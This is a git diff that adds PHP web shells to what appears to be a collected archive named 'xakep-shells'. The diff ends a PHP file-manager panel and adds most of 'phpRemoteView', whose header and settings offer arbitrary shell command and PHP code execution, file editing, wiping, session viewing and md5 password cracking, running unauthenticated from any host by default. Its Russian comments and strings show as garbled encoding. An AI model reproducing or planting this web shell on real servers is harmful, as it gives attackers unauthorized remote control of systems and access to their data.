+		} else {
+			echo("		<td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=");
+			if (substr($file['filename'], 0, 1) == '.') echo('13'); else echo('12');
+			echo("\" width=\"17\" height=\"13\"></td>\n");
+			echo('		<td');
+			if (substr($file['permission'], 0, 1) != '-') echo($cspan);
+			echo(' bgcolor="#FFFFFF">');
+			if ($file['is_readable'] && $file['is_file']) echo("<a href=\"$self?show=" . urlencode($file['fullfilename']) . "$p\">");
+			echo(htmlentities($file['filename']));
+			if ($file['is_readable'] && $file['is_file']) echo('</a>');
+			if ($file['is_file'] && is_script($file['filename'])) echo(" <a href=\"$self?showh=" . urlencode($file['fullfilename']) . "$p\">*</a>");
+			echo("</td>\n");
+			if ($GLOBALS['showsize'] && $file['is_file']) {
+				echo("		<td bgcolor=\"#FFFFFF\" align=\"right\" nowrap>");
+				if ($file['is_file']) echo("{$file['size']} B");
+				echo("</td>\n"); 
+			}
+		}
+		echo('		<td bgcolor="#FFFFFF" class="perm">');
+		if ($uid == $file['owner'] && !$file['is_link']) echo("<a href=\"$self?permission=" . urlencode($file['fullfilename']) . "$p\">");
+		echo($file['permission']);
+		if ($uid == $file['owner'] && !$file['is_link']) echo('</a>');
+		echo("</td>\n");
+		$owner = ($file['ownername'] == NULL) ? $file['owner'] : $file['ownername'];
+		$group = ($file['groupname'] == NULL) ? $file['group'] : $file['groupname'];
+		echo('		<td bgcolor="#FFFFFF">' . $owner . "</td>\n");
+		echo('		<td bgcolor="#FFFFFF">' . $group . "</td>\n");
+		$f = "<a href=\"$self?symlinktarget=" . urlencode($dir . $file['filename']). "$p\">{$words['createsymlink']}</a> | ";;
+		if ($file['filename'] != '.' && $file['filename'] != '..') {
+			if ($file['is_readable'] && $file['is_file']) {
+				$f .= "<a href=\"$self?cpy=" . urlencode($file['fullfilename']). "$p\">{$words['copy']}</a> | ";
+			}
+			if ($uid == $file['owner']) {
+				$f .= "<a href=\"$self?move=" . urlencode($file['fullfilename']) . "$p\">{$words['move']}</a> | ";
+				$f .= "<a href=\"$self?delete=" . urlencode($dir . $file['filename']). "$p\">{$words['delete']}</a> | ";
+			}
+			if ($file['is_writable'] && $file['is_file']) {
+				$f .= "<a href=\"$self?edit=" . urlencode($file['fullfilename']) . "$p\">{$words['edit']}</a> | ";
+			}
+		}
+		if ($file['is_dir'] && @is_file($file['fullfilename'] . '.htaccess') && @is_writable($file['fullfilename'] . '.htaccess')) {
+			$f .= "<a href=\"$self?edit=" . urlencode($file['fullfilename']) . '.htaccess' . "$p\">{$words['configure']}</a> | ";
+		}
+		if (!empty($f)) $f = substr($f, 0, strlen($f) - 3); else $f = '&nbsp;';
+		echo("		<td bgcolor=\"#FFFFFF\" nowrap>$f</td>\n");
+		echo("	</tr>\n");
+	}
+?>
+	</table>
+	</td></tr></table>
+	</p>
+<?php
+	return;
+}
+
+function sortfiles ($files, $sort, $reverse) {
+	$files = sortfield($files, $sort, $reverse, 0, sizeof($files) - 1);
+	if ($sort != 'filename') {
+		$old = $files[0][$sort]; $oldpos = 0;
+		for ($i = 1; $i < sizeof($files); $i++) {
+			if ($old != $files[$i][$sort]) {
+				if ($oldpos != ($i - 1)) $files = sortfield($files, 'filename', false, $oldpos, $i - 1);
+				$oldpos = $i;
+			}
+			$old = $files[$i][$sort];
+		}
+		if ($oldpos < ($i - 1)) $files = sortfield($files, 'filename', false, $oldpos, $i - 1);
+	}
+	return $files;
+}
+
+function octtostr ($mode) {
+	if     (($mode & 0xC000) === 0xC000) $type = 's'; /* Unix domain socket */
+	elseif (($mode & 0x4000) === 0x4000) $type = 'd'; /* Directory */
+	elseif (($mode & 0xA000) === 0xA000) $type = 'l'; /* Symbolic link */
+	elseif (($mode & 0x8000) === 0x8000) $type = '-'; /* Regular file */
+	elseif (($mode & 0x6000) === 0x6000) $type = 'b'; /* Block special file */
+	elseif (($mode & 0x2000) === 0x2000) $type = 'c'; /* Character special file */
+	elseif (($mode & 0x1000) === 0x1000) $type = 'p'; /* Named pipe */
+	else                                 $type = '?'; /* Unknown */
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) $owner .= ($mode & 00100) ? 's' : 'S'; else $owner .= ($mode & 00100) ? 'x' : '-';
+	$group  = ($mode & 00040) ? 'r' : '-';
+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) $group .= ($mode & 00010) ? 's' : 'S'; else $group .= ($mode & 00010) ? 'x' : '-';
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) $other .= ($mode & 00001) ? 't' : 'T'; else $other .= ($mode & 00001) ? 'x' : '-';
+	return $type . $owner . $group . $other;
+}
+
+function sortfield ($field, $column, $reverse, $left, $right){
+	$g = $field[(int) (($left + $right) / 2)][$column];
+	$l = $left; $r = $right;
+	while ($l <= $r) {
+		if ($reverse) {
+			while (($l < $right) && ($field[$l][$column] > $g)) $l++;
+			while (($r > $left)  && ($field[$r][$column] < $g)) $r--;
+		} else {
+			while (($l < $right) && ($field[$l][$column] < $g)) $l++;
+			while (($r > $left)  && ($field[$r][$column] > $g)) $r--;
+		}
+		if ($l < $r) {
+			$tmp = $field[$r];
+			$field[$r] = $field[$l];
+			$field[$l] = $tmp;
+			$r--;
+			$l++;
+		} else {
+			$l++;
+		}
+	}
+	if ($r > $left) $field = sortfield($field, $column, $reverse, $left, $r);
+	if ($r + 1 < $right) $field = sortfield($field, $column, $reverse, $r + 1, $right);
+	return $field;
+}
+
+function buildphrase ($repl, $str) {
+	if (!is_array($repl)) $repl = array($repl);
+	$newstr = ''; $prevz = ' ';
+	for ($i = 0; $i < strlen($str); $i++) {
+		$z = substr($str, $i, 1);
+		if (((int) $z) > 0 && ((int) $z) <= count($repl) && $prevz == ' ') $newstr .= $repl[((int) $z) - 1]; else $newstr .= $z;
+		$prevz = $z;
+	}
+	return $newstr;
+}
+
+function html_header ($action) {
+	global $self;
+	global $error, $notice, $updatetreeview;
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
+<html>
+<head>
+	<title><?php echo("$self - $action"); ?></title>
+	<style type="text/css">
+	<!--
+		td { font-family: sans-serif; font-size: 10pt; }
+		a:link, a:visited, a:active { text-decoration: none; color: #000088; }
+		a:hover { text-decoration: underline; color: #000088; }
+		.perm { font-family: monospace; font-size: 10pt; }
+	-->
+	</style>
+<?php
+	if (isset($_REQUEST['edit']) && !isset($_POST['save']) && basename($edit = $_REQUEST['edit']) == '.htaccess') {
+		$file = dirname($edit) . '/.htpasswd';
+?>
+	<script type="text/javascript" language="JavaScript">
+	<!--
+	function autheinf () {
+		document.f.content.value += "Authtype Basic\nAuthName \"Restricted Directory\"\n";
+		document.f.content.value += "AuthUserFile <?php echo(htmlentities($file)); ?>\n";
+		document.f.content.value += "Require valid-user";
+	}
+	//-->
+	</script>
+<?php
+	}
+?>
+</head>
+<body bgcolor="#FFFFFF"<?php if ($updatetreeview && !empty($_SESSION['tree'])) echo(" '$self?frame=treeview&dir=" . urlencode($_SESSION['dir']) . '&' . SID . '&pmru=' . time() . '#' . urlencode($_SESSION['dir']) . "'))\""); ?>>
+<?php
+	if (!empty($error)) perror($error);
+	if (!empty($notice)) pnotice($notice);
+	return;
+}
+
+function html_footer ($backbutton = TRUE) {
+	global $self, $words;
+	if ($backbutton) {
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#EEEEEE">
+	<a href="<?php echo("$self?id=". $_REQUEST['id']); ?>"><?php echo($words['back']); ?></a>
+	</td></tr></table>
+	</td></tr></table>
+	</p>
+<?php
+	}
+?>
+</body>
+</html>
+<?php
+	return;
+}
+
+function perror ($str) {
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#FFCCCC">
+	<?php echo("$str\n"); ?>
+	</td></tr></table>
+	</td></tr></table>
+	</p>
+<?php
+	return;
+}
+
+function pnotice ($str) {
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#CCFFCC">
+	<?php echo("$str\n"); ?>
+	</td></tr></table>
+	</td></tr></table>
+	</p>
+<?php
+	return;
+}
+
+?>
diff --git a/xakep-shells/PHP/Rem View.php.php.txt b/xakep-shells/PHP/Rem View.php.php.txt
new file mode 100644
index 0000000..4d6e436
--- /dev/null
+++ b/xakep-shells/PHP/Rem View.php.php.txt	
@@ -0,0 +1,2553 @@
+<?php
+
+/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+ *
+ *  Welcome to phpRemoteView (RemView) 
+ *
+ *  View/Edit remove file system:
+ *  - view index of directory (/var/log - view logs, /tmp - view PHP sessions)
+ *  - view name, size, owner:group, perms, modify time of files
+ *  - view html/txt/image/session files
+ *  - download any file and open on Notepad
+ *  - create/edit/delete file/dirs
+ *  - executing any shell commands and any PHP-code
+ *
+ *  Free download from http://php.spb.ru/remview/
+ *  Version 04c, 2003-10-23. 
+ *  Please, report bugs...
+ *
+ *  This programm for Unix/Windows system and PHP4 (or higest).
+ *
+ *  (c) Dmitry Borodin, dima@php.spb.ru, http://php.spb.ru
+ *
+ * * * * * * * * * * * * * * * * * WHATS NEW * * * * * * * * * * * * * * * *
+ *
+ * --version4--
+ *  2003.10.23 support short <?php ?> tags, thanks A.Voropay
+ *
+ *  2003.04.22 read first 64Kb of null-size file (example: /etc/zero), 
+ *                thanks Anight
+ *             add many functions/converts: md5, decode md5 (pass crack), 
+ *                date/time, base64, translit, russian charsets
+ *             fix bug: read session files
+ *
+ *  2002.08.24 new design and images
+ *             many colums in panel
+ *             sort & setup panel
+ *             dir tree
+ *             base64 encoding
+ *             character map
+ *             HTTP authentication with login/pass
+ *             IP-address authentication with allow hosts
+ *
+ * --version3--
+ *  2002.08.10 add multi language support (english and russian)
+ *             some update
+ *
+ *  2002.08.05 new: full windows support
+ *             fix some bugs, thanks Jeremy Flinston
+ * 
+ *  2002.07.31 add file upload for create files
+ *             add 'direcrory commands'
+ *             view full info after safe_mode errors
+ *             fixed problem with register_glogals=off in php.ini
+ *             fixed problem with magic quotes in php.ini (auto strip slashes)
+ *
+ * --version2--
+ *  2002.01.20 add panel 'TOOLS': eval php-code and run shell commands
+ *             add panel 'TOOLS': eval php-code and run shell commands
+ *             add copy/edit/create file (+panel 'EDIT')
+ *             add only-read mode (disable write/delete and PHP/Shell)
+ *
+ *  2002.01.19 add delete/touch/clean/wipe file
+ *             add panel 'INFO', view a/c/m-time, hexdump view
+ *             add session file view mode (link 'SESSION').
+ *
+ *  2002.01.12 first version!
+ *
+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
+
+///////////////////////////////// S E T U P ///////////////////////////////////
+
+   
+   $version="2003-10-23";
+
+   $hexdump_lines=8;        // lines in hex preview file
+   $hexdump_rows=24;        // 16, 24 or 32 bytes in one line
+
+   $mkdir_mode=0755;        // chmode for new dir ('MkDir' button)
+
+   $maxsize_fread=65536;    // read first 64Kb from any null-size file
+
+   // USER ACCESS //
+
+   $write_access=true;      // true - user (you) may be write/delete files/dirs
+                            // false - only read access
+
+   $phpeval_access=true;    // true - user (you) may be execute any php-code
+                            // false - function eval() disable
+   
+   $system_access=true;     // true - user (you) may be run shell commands
+                            // false - function system() disable
+   
+   // AUTHORIZATION //
+
+   $login=false;            // Login & password for access to this programm.
+   $pass=false;             // Example: $login="MyLogin"; $pass="MyPaSsWoRd";
+                            // Type 'login=false' for disable authorization.
+
+   $host_allow=array("*");  // Type list of your(allow) hosts. All other - denied.
+                            // Example: $host_allow=array("127.0.0.*","localhost")
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+   $tmp=array();
+   foreach ($host_allow as $k=>$v)
+      $tmp[]=str_replace("\\*",".*",preg_quote($v));
+   $s="!^(".implode("|",$tmp).")$!i";
+   if (!preg_match($s,getenv("REMOTE_ADDR")) && !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) 
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - your host not allow</h1>\n");
+   if ($login!==false && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || 
+      $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$login || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)) {
+      header("WWW-Authenticate: Basic realm=\"phpRemoteView\"");
+      header("HTTP/1.0 401 Unauthorized");
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - password erroneous</h1>\n");
+   }
+
+   error_reporting(2047);
+   set_magic_quotes_runtime(0);
+   @set_time_limit(0);
+   @ini_set('max_execution_time',0);
+   @ini_set('output_buffering',0);
+   if (function_exists("ob_start") && (!isset($c) || $c!="md5crack")) ob_start("ob_gzhandler");
+
+   $self=basename($HTTP_SERVER_VARS['PHP_SELF']);
+
+   $url="http://".getenv('HTTP_HOST').
+        (getenv('SERVER_PORT')!=80 ? ":".getenv('SERVER_PORT') : "").
+        $HTTP_SERVER_VARS['PHP_SELF'].
+        (getenv('QUERY_STRING')!="" ? "?".getenv('QUERY_STRING') : "");
+   $uurl=urlencode($url);
+
+   //
+   // antofix 'register globals': $HTTP_GET/POST_VARS -> normal vars;
+   //
+   $autovars1="c d f php skipphp pre nlbr xmp htmls shell skipshell pos ".
+              "ftype fnot c2 confirm text df df2 df3 df4 ref from to ".
+              "fatt showfile showsize root name ref names sort sortby ".
+              "datetime fontname fontname2 fontsize pan limit convert fulltime fullqty";
+   foreach (explode(" ",$autovars1) as $k=>$v)  {
+      if (isset($HTTP_POST_VARS[$v])) $$v=$HTTP_POST_VARS[$v];
+         elseif (isset($HTTP_GET_VARS[$v])) $$v=$HTTP_GET_VARS[$v];
+            //elseif (isset($HTTP_COOKIE_VARS[$v])) $$v=$HTTP_COOKIE_VARS[$v];
+   }
+
+   //
+   // autofix 'magic quotes':
+   //
+   $autovars2="php shell text d root convert";
+   if (get_magic_quotes_runtime() || get_magic_quotes_gpc()) {
+      foreach (explode(" ",$autovars2) as $k=>$v) {
+         if (isset($$v)) $$v=stripslashes($$v);
+      }
+   }
+
+   $cp_def=array(
+      "001001",
+      "nst2ac",
+      "d/m/y H:i",
+      "Tahoma",
+      "9"
+      );
+
+   $panel=0;
+   if (isset($HTTP_COOKIE_VARS["cp$panel"])) 
+      $cp=explode("~",$HTTP_COOKIE_VARS["cp$panel"]); 
+   else 
+      $cp=$cp_def;
+   $cc=$cp[0];
+   $cn=$cp[1];
+
+/*
+
+$cc / $cp[0]- ñïèñîê îäíîáóêâåííûõ ïàðàìåòðîâ, ñêîïèðîâàíî â $cs:
+   $cc[0] - ïî êàêîé êîëîíêå ñîðòèðîâàòü, à åñëè ýòî íå öèôðà:
+               n - ïî èìåíè
+               e - ðàñøèðåíèå
+   $cc[1] - ïîðÿäîê (0 - âîçðàñò. 1 - óáûâàþùèé)
+   $cc[2] - ïîêàçûâàòü ëè èêîíêè
+   $cc[3] - ÷òî äåëàòü ïðè êëèêå ïî èêîíêå ôàéëà:
+               0 - ïðîñìîòð â text/plain
+               1 - ïðîñìîòð â html
+               2 - download
+               3 - ïàðàìåòðû ôàéëà (info)
+   $cc[4] - îêðóãëÿòü ðàçìåð ôàéëîâ äî Êá/Ìá/Ãá
+   $cc[5] - ÿçûê:
+               1 - àíãëèéñêèé
+               2 - ðóññêè
+
+$cn / $cp[1] - ñïèñîê êîëîíîê è èõ ïîðÿäîê, êîòîðûå ïîêàçûâàòü, ñòðîêà áóêâ/öèôð:
+   t - type
+   n - name
+   s - size
+   a - owner+group
+   o - owner
+   g - group
+   c - chmod
+   1 - create time
+   2 - modify time
+   3 - access time
+
+$cp[2]: ôîðìàò âðåìåíè
+
+$cp[3]: èìÿ øðèôòà
+
+$cp[4]: ðàçìåð øðèôòà
+
+*/
+
+   // Êàê âûðàâíèâàòü êîëîíêè
+   $cn_align=array();
+   $cn_align['t']='center';
+   $cn_align['n']='left';
+   $cn_align['s']='right';
+   $cn_align['a']='center';
+   $cn_align['o']='center';
+   $cn_align['g']='center';
+   $cn_align['c']='center';
+   $cn_align['1']='center';
+   $cn_align['2']='center';
+   $cn_align['3']='center';
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+/*--mmstart--*/
+$mm=array(
+"Index of"=>"Èíäåêñ",
+"View file"=>"Ïîêàç ôàéëà",
+"DISK"=>"ÄÈÑÊ",
+"Info"=>"Èíôî",
+"Plain"=>"Ïðÿìîé",
+"HTML"=>"HTML",
+"Session"=>"Ñåññèÿ",
+"Image"=>"Êàðòèíêà",
+"Notepad"=>"Áëîêíîò",
+"DOWNLOAD"=>"ÇÀÃÐÓÇÈÒÜ",
+"Edit"=>"Ïðàâêà",
+"Sorry, this programm run in read-only mode."=>"Èçâèíèòå, ýòà ïðîãðàììà ðàáîòàåò â ðåæèìå 'òîëüêî ÷òåíèå'.",
+"For full access: write"=>"Äëÿ ïîëíîãî äîñòóïà: íàïèøèòå",
+"in this php-file"=>"â ýòîì php-ôàéëå",
+"Reason"=>"Ïðè÷èíà",
+"Error path"=>"Îøèáî÷íûé ïóòü",
+"Click here for start"=>"Íàæìèòå äëÿ ñòàðòà",
+"up directory"=>"êàòàëîã âûøå",
+"access denied"=>"äîñòóï çàïðåùåí",
+"REMVIEW TOOLS"=>"ÓÒÈËÈÒÛ REMVIEW",
+"version"=>"âåðñèÿ",
+"Free download"=>"Áåñïëàòíàÿ çàãðóçêà",
+"back to directory"=>"âåðíóòüñÿ â êàòàëîã",
+"Size"=>"Ðàçìåð",
+"Owner"=>"Îâíåð",
+"Group"=>"Ãðóïïà",
+"FileType"=>"Òèï ôàéëà",
+"Perms"=>"Ïðàâà",
+"Create time"=>"Âðåìÿ ñîçäàíèÿ",
+"Access time"=>"Âðåìÿ äîñòóïà",
+"MODIFY time"=>"Âðåìÿ ÈÇÌÅÍÅÍÈß",
+"HEXDUMP PREVIEW"=>"ÏÐÅÄÏÐÎÑÌÎÒÐ Â 16-ÐÈ×ÍÎÌ ÂÈÄÅ",
+"ONLY READ ACCESS"=>"ÄÎÑÒÓÏ ÒÎËÜÊÎ ÍÀ ×ÒÅÍÈÅ",
+"Can't READ file - access denied"=>"Íå ìîãó ïðî÷èòàòü - äîñòóï çàïðåùåí",
+"full read/write access"=>"ïîëíûé äîñòóï íà ÷òåíèå/çàïèñü",
+"FILE SYSTEM COMMANDS"=>"ÊÎÌÀÍÄÛ ÔÀÉËÎÂÎÉ ÑÈÑÒÅÌÛ",
+"EDIT"=>"ÐÅÄÀÊÒ.",
+"FILE"=>"ÔÀÉË",
+"DELETE"=>"ÑÒÅÐÅÒÜ",
+"Delete this file"=>"Ñòåðåòü ôàéë",
+"CLEAN"=>"Î×ÈÑÒÈÒÜ",
+"TOUCH"=>"ÎÁÍÎÂÈÒÜ",
+"Set current 'mtime'"=>"Óñòàí.òåêóù.âðåìÿ",
+"WIPE(delete)"=>"ÓÍÈ×ÒÎÆÈÒÜ",
+"Write '0000..' and delete"=>"Çàáèòü íóëÿìè, ñòåðåòü",
+"COPY FILE"=>"ÊÎÏÈÐÎÂÀÒÜ ÔÀÉË",
+"COPY"=>"ÊÎÏÈÐÎÂÀÒÜ",
+"MAKE DIR"=>"ÑÎÇÄÀÒÜ ÊÀÒÀËÎÃ",
+"type full path"=>"ââåäèòå ïîëíûé ïóòü",
+"MkDir"=>"Ñîçä.Êàò.",
+"CREATE NEW FILE or override old file"=>"ÑÎÇÄÀÒÜ ÍÎÂÛÉ ÔÀÉË èëè ïåðåçàïèñàòü ñòàðûé",
+"CREATE/OVERRIDE"=>"ÑÎÇÄÀÒÜ/ÏÅÐÅÇÀÏÈÑÀÒÜ",
+"select file on your local computer"=>"âûáðàòü ôàéë íà âàøåì ëîêàëüíîì êîìïüþòåðå",
+"save this file on path"=>"ñîõðàíèòü ýòîò ôàéë â êàòàëîã",
+"create file name automatic"=>"ïðèäóìàòü èìÿ ôàéëó àâòîìàòè÷åñêè",
+"OR"=>"ÈËÈ",
+"type any file name"=>"ââåñòè èìÿ ôàéëà âðó÷íóþ",
+"convert file name to lovercase"=>"êîíâåðòèðîâàòü èìÿ â íèæíèé ðåãèñòð",
+"Send File"=>"Ïîñëàòü ôàéë",
+"Delete all files in dir"=>"Óäàëèòü âñå ôàéëû",
+"Delete all dir/files recursive"=>"Óäàëèòü ÂÑÅ +ïîäêàòàëîãè ðåêóðñèâíî",
+"Confirm not found (go back and set checkbox)"=>"Ïîäòâåðæäåíèå íå ïîñòàâëåíî (âåðíèòåñü íàçàä è ïîñòàâüòå ãàëî÷êó)",
+"Delete cancel - File not found"=>"Óäàëåíèå îòìåíåíî - Ôàéë íå íàéäåí",
+"YES"=>"ÄÀ",
+"ME"=>"ÌÅÍß",
+"NO (back)"=>"ÍÅÒ (íàçàä)",
+"Delete cancel"=>"Óäàëåíèå îòìåíåíî",
+"ACCESS DENIED"=>"ÄÎÑÒÓÏ ÇÀÏÐÅÙÅÍ",
+"done (go back)"=>"ãîòîâî (íàçàä)",
+"Delete ok"=>"Îê, óäàëåííî",
+"Touch cancel"=>"Îáíîâëåíèå îòìåíåíî",
+"Touch ok (set current time to 'modify time')"=>"Îáíîâëåíèå çàâåðøåíî (ôàéëó ïðèñâîåíî òåêóùåå âðåìÿ ìîäèôèêàöèè)",
+"Clean (empty file) cancel"=>"Î÷èùåíèå (îáíóëåíèå ôàéëà) îòìåíåíî",
+"Clean ok (file now empty)"=>"Îê, î÷èùåíî (ôàéë îáíóëåí)",
+"Wipe cancel - access denied"=>"Óíè÷òîæåíèå îòìåíåíî - äîñòóï çàïðåùåí",
+"Wipe ok (file deleted)"=>"Îê, óíè÷òîæåíî (è ôàéë ñòåðò)",
+"DIR"=>"DIR",
+"Deleting all files in"=>"Óäàëåíèå âñåõ ôàéëîâ â",
+"skip"=>"ïðîïóñê",
+"deleting"=>"óäàëåíèå",
+"Deleting all dir/files (recursive) in"=>"Óäàëåíèå âñåõ ôàéëîâ/ïîäêàòàëîãîâ (ðåêóðñèâíî)",
+"DONE, go back"=>"ÃÎÒÎÂÎ, íàçàä",
+"DONE"=>"ÃÎÒÎÂÎ",
+"file not found"=>"ôàéë íå íàéäåí",
+"ONLY READ ACCESS (don't edit!)"=>"ÄÎÑÒÓÏ ÒÎËÜÊÎ ÍÀ ×ÒÅÍÈÅ (íå ðåäàêòèðîâàòü)",
+"Can't READ file - access denied (don't edit!)"=>"Íå ìîãó ×ÈÒÀÒÜ ôàéë - äîñòóï çàïðåùåí",
+"EDIT FILE"=>"ÏÐÀÂÈÒÜ ÔÀÉË",
+"can't open, access denied"=>"íå ìîãó îòêðûòü, äîñòóï çàïðåùåí",
+"SAVE FILE (write to disk)"=>"ÑÎÕÐÀÍÈÒÜ ÔÀÉË (çàïèñü íà äèñê)",
+"You mast checked 'create file name automatic' OR typed file name!"=>"Âû äîëæíû îòìåòèòü ãàëî÷êó [ñîçäàòü ôàéë àâòîìàòè÷åñêè] èëè ââåñòè â ïîëå èìÿ ôàéëà!'",
+"SAVING TO"=>"ÑÎÕÐÀÍÈÒÜ Â",
+"Sorry, access denied"=>"Èçâèíèòå, äîñòóï çàïðåùåí",
+"for example, uncomment next line"=>"äëÿ ïðèìåðà, ðàñêîììåíòèðóéòå ñëåäóþùóþ ñòðîêó",
+"Eval PHP code"=>"Âûïîëíèòü PHP êîä",
+"don't type"=>"íå ïèøèòå",
+"and"=>"è",
+"example (remove comments '#')"=>"ïðèìåð (óäàëèòå êîììåíòàðèè '#')",
+"Shell commands"=>"Êîìàíäû Shell'a",
+"filesize to 0byte"=>"ðàçìåð â 0 áàéò",
+"from"=>"îò",
+"to"=>"â",
+"Full file name"=>"Ïîëíîå èìÿ ôàéëà",
+"Can't open directory"=>"Íå ìîãó îòêðûòü êàòàëîã",
+"setup"=>"íàñòðîéêà",
+"back"=>"íàçàä",
+"Reset all settings"=>"Ñáðîñèòü âñå íàñòðîéêè",
+"clear"=>"î÷èñòèòü",
+"Current"=>"Òåêóùèå",
+"Colums and sort"=>"Êîëîíêè è ñîðòèðîâêà",
+"Sort order"=>"Ïîðÿäîê ñîðòèðîâêè",
+"Ascending sort"=>"Ïî âîçðàñòàíèþ",
+"Descending sort"=>"Ïî óáûâàíèþ",
+"Sort by filename"=>"Ñîðòèðîâàòü ïî èìåíè ôàéëà",
+"Sort by filename extension"=>"Ñîðòèðîâàòü ïî ðàñøèðåíèþ ôàéëà",
+"Date/time format"=>"Ôîðìàò äàòû/âðåìåíè",
+"Panel font & size"=>"Øðèôò/ðàçìåð ïàíåëè",
+"Setup"=>"Îïöèè",
+"Char map"=>"Ñèìâîëû",
+"Language"=>"ßçûê",
+"English"=>"Àíãëèéñêèé",
+"Russian"=>"Ðóññêèé",
+"Character map (symbol codes table)"=>"Òàáëèöà ñèìâîëîâ",
+"Select font"=>"Âûáåðèòå øðèôò",
+"or type other"=>"èëè ââåäèòå äðóãîé",
+"Font size"=>"Ðàçìåð øðèôòà",
+"Code limit"=>"Äèïàçîí êîäîâ",
+"Generate table"=>"Ñãåíåðèðîâàòü òàáëèöó",
+"Universal convert"=>"Óíèâåðñàëüíûå êîíâåðòàöèè"
+);/*--mmstop--*/
+
+
+
+
+   $language=$cc[5];
+   if ($language!=1 && $language!=2) $language=1;
+
+
+function mm($m) {
+   global $mm,$language;
+   if ($language==1) return $m;
+   if (isset($mm[$m])) return $mm[$m];
+   else echo "<script>alert('(mm) msg not found: $m');</script>";
+}
+
+
+switch ($language) {
+case 1:
+$cn_name=array(
+'t'=>"Type",
+'n'=>"Name",
+'s'=>"Size",
+'o'=>"Owner",
+'g'=>"Group",
+'a'=>"Owner/Group",
+'c'=>"Perms",
+'1'=>"Create",
+'2'=>"Modify",
+'3'=>"Access"
+);
+break;
+case 2:
+$cn_name=array(
+'t'=>"Òèï",
+'n'=>"Èìÿ",
+'s'=>"Ðàçìåð",
+'o'=>"Âëàäåëåö",
+'g'=>"Ãðóïïà",
+'a'=>"Âëàäåëåö/Ãðóïïà",
+'c'=>"Ïðàâà",
+'1'=>"Ñîçäàí",
+'2'=>"Èçìåíåí",
+'3'=>"Äîñòóï"
+);
+break;
+}
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+
+   $rand=microtime();
+
+   if (!isset($c)) $c="";
+   if (!isset($d)) $d="";
+   if (!isset($f)) $f="";
+
+   ob();
+   $d=str_replace("\\","/",$d);
+   if ($d=="") $d=realpath("./")."/";
+   if ($c=="") $c="l";
+   if ($d[strlen($d)-1]!="/") $d.="/";
+   $d=str_replace("\\","/",$d);
+   if (!is_dir($d)) obb().die("<h3><P>".mm("Can't open directory")." <tt><font color=red><big>$d</big></font></tt>$obb");
+   if (!realpath($d) || filetype($d)!="dir") obb().die("error dir type $obb");
+   obb();
+
+   //
+   // OS detect:
+   //
+   $win=0;
+   $unix=0;
+   if (strlen($d)>1 && $d[1]==":") $win=1; else $unix=1;
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+$html=<<<remview
+<html><head>
+<title>phpRemoteView: $d$f</title>
+</head>
+<body>
+<style>
+A {
+text-decoration : none;
+}
+.t {
+font-size: 9pt;
+text-align : center;
+font-family: Verdana;
+}
+.t2 {
+font-size: 8pt;
+text-align : center;
+font-family: Verdana;
+}
+.n {
+  font-family: Fixedsys
+}
+.s {
+font-size: 10pt;
+text-align : right;
+font-family: Verdana;
+}
+.sy {
+font-family: Fixedsys;
+}
+.s2 {
+font-family: Fixedsys;
+color: red;
+}
+.tab {
+font-size: 10pt;
+text-align : center;
+font-family: Verdana;
+background: #cccccc;
+}
+.tr {
+background: #ffffff;
+}
+</style>
+remview;
+
+
+
+function display_perms($mode) 
+{ 
+if ($GLOBALS['win']) return 0;
+/* Determine Type */ 
+if( $mode & 0x1000 ) 
+$type='p'; /* FIFO pipe */ 
+else if( $mode & 0x2000 ) 
+$type='c'; /* Character special */ 
+else if( $mode & 0x4000 ) 
+$type='d'; /* Directory */ 
+else if( $mode & 0x6000 ) 
+$type='b'; /* Block special */ 
+else if( $mode & 0x8000 ) 
+$type='-'; /* Regular */ 
+else if( $mode & 0xA000 ) 
+$type='l'; /* Symbolic Link */ 
+else if( $mode & 0xC000 ) 
+$type='s'; /* Socket */ 
+else 
+$type='u'; /* UNKNOWN */ 
+
+/* Determine permissions */ 
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+
+/* Adjust for SUID, SGID and sticky bit */ 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
